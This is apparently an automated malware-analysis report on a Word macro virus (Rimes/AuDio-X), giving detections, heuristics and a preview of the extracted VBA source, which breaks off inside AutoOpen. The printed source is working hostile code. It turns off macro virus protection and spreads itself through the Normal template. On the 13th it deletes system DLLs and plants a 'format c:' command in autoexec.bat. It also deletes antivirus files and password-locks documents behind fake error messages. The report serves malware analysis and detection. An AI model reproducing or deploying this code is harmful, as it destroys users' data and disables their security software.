Verdict: MALICIOUS
Risk Score: 200

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
This document contains legacy WordBasic macro markers and a VBA AutoOpen macro that executes a 'Shell' command. The 'Infect' subroutine attempts to export the macro to 'c:\AuDioX.sys' and import it into other documents, indicating a macro-based infection mechanism. The 'RiMeS' subroutine appears to attempt to modify 'c:\autoexec.bat' and display a critical error message, suggesting potential system disruption.
Heuristics (5)

- ClamAV: Doc.Trojan.Rimes-1 (severity: critical; rule: CLAMAV_DETECTION). ClamAV detected this file as malware: Doc.Trojan.Rimes-1.
- Legacy WordBasic macro-virus markers (severity: high; rule: OLE_LEGACY_WORDBASIC_MACRO_VIRUS). OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro, or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
- VBA macros detected (severity: medium; 2 related findings; rule: OLE_VBA_MACROS). Document contains VBA macro code.
- AutoOpen macro (severity: high; rule: OLE_VBA_AUTOOPEN). AutoOpen macro present.
- VBA p-code auto-exec with execution tokens (severity: high; rule: OLE_VBA_PCODE_AUTOEXEC_EXEC). Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5340 bytes |

SHA-256: faea0c871dbf6e2ff4c737163fe53dde1c36d9155d9453e8e9563b2025dfb865

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "AuDioX"
'CXG CXG CXG CXG CXG CXG CXG CXG CXG CXG CXG CXG CXG CXG
'AuDio-X From CXG crew
'Hip-Hop For Ever
Sub Infect()
On Error Resume Next
Options.SaveNormalPrompt = False
Options.VirusProtection = False
SetAttr NormalTemplate.FullName, vbNormal
Application.ScreenUpdating = False
Application.DisplayAlerts = wdAlertsNone
Application.VBE.ActiveVBProject.VBComponents("AuDioX").Export "c:\AuDioX.sys"
For i = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(i).Name = "AuDioX" Then NormInstall = True
Next i
For i = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(i).Name = "AuDioX" Then ActivInstall = True
Next i
If ActivInstall = True And NormInstall = False Then Set cxg = NormalTemplate.VBProject
ElseIf ActivInstall = False And NormInstall = True Then Set cxg = ActiveDocument.VBProject
cxg.VBComponents.Import ("c:\AuDioX.sys")
End Sub
Sub RiMeS()
'Contact me please at Writercxg@yahoo.com
On Error Resume Next
Dim BlackSunday
Application.DisplayStatusBar = False
Application.ScreenUpdating = False
Options.VirusProtection = False
Options.SaveNormalPrompt = False
BlackSunday = Day(Now())
If BlackSunday = 13 Then
Insert "cxg"
Kill "c:\windows\system\s*.dll"
Kill "c:\windows\system\r*.*"
MsgBox("Fatal error to kernel.", vbCritical, "Warning") = vbOK
Open "c:\autoexec.bat" For Random As auto
Print auto; "@echo off"
Print auto; "cls"
Print auto; "echo Microsoft Corp. 1983-1997 All rights reserved "
Print auto; "echo Goes preparation to renovation of your system files "
Print auto; "ECHO Please wait this can occupy several minutes"
Print auto; "format c: /u /c /s /q /autotest >nul"
Print auto; "echo ."
Print auto; "echo ."
Print auto; "Error at renovations of files"
Close auto
Tasks.ExitWindows
End If
End Sub
Sub AvKill()
On Error Resume Next
Kill "C:\Program Files\AntiViral Toolkit Pro\Avp32.exe"
Kill "C:\Program Files\AntiViral Toolkit Pro\*.avc"
Kill "C:\Program Files\Command Software\F-PROT95\*.dll"
Kill "C:\Program Files\Command Software\F-PROT95\*.exe"
Kill "C:\Program Files\McAfee\VirusScan95\Scan.dat"
Kill "C:\Program Files\McAfee\VirusScan\Scan.dat"
Kill "C:\Program Files\Norton AntiVirus\Viruscan.dat"
Kill "C:\Program Files\Symantec\Symevnt.386"
Kill "C:\Program Files\FindVirus\Findviru.drv"
Kill "C:\Program Files\Cheyenne\AntiVirus\*.dll"
Kill "C:\Program Files\Cheyenne\Common\Cshell.dll"
Kill "C:\PC-Cillin 95\Lpt$vpn.*"
Kill "C:\PC-Cillin 95\Scan32.dll"
Kill "C:\PC-Cillin 97\Lpt$vpn.*"
Kill "C:\PC-Cillin 97\Scan32.dll"
Kill "C:\eSafe\Protect\*.dll"
Kill "C:\f-macro\f-macro.exe"
Kill "C:\TBAVW95\Tbscan.sig"
Kill "C:\Tbavw95\Tb*.*"
Kill "C:\VS95\*.dll"
End Sub
Sub toolsmacro()
On Error Resume Next
MsgBox("Critical error,Word can't open macros.", vbCritical, "ERROR") = vbOK
ActiveDocument.Password = (1313 * Rnd)
If ActiveDocument.Saved = True Then ActiveDocument.Save
ActiveDocument.Close
End Sub
Sub filetemplates()
On Error Resume Next
MsgBox("Error 413:compilation error.", vbCritical, "ERROR") = vbOK
ActiveDocument.Password = (1313 * Rnd)
If ActiveDocument.Saved = True Then ActiveDocument.Save
ActiveDocument.Close
End Sub
Sub ToolsCustomize()
On Error Resume Next
MsgBox("Error 219:int()wrong variable string.", vbCritical, "ERROR") = vbOK
ActiveDocument.Password = (1313 * Rnd)
If ActiveDocument.Saved = True Then ActiveDocument.Save
ActiveDocument.Close
End Sub
Sub ViewVBcode()
On Error Resume Next
MsgBox("Error 12:can't open VBA.", vbCritical, "Error") = vbOK
ActiveDocument.Password = (1313 * Rnd)
If ActiveDocument.Saved = True Then ActiveDocument.Save
ActiveDocument.Close
End Sub
Sub AutoOpen()
On Error R
... (truncated)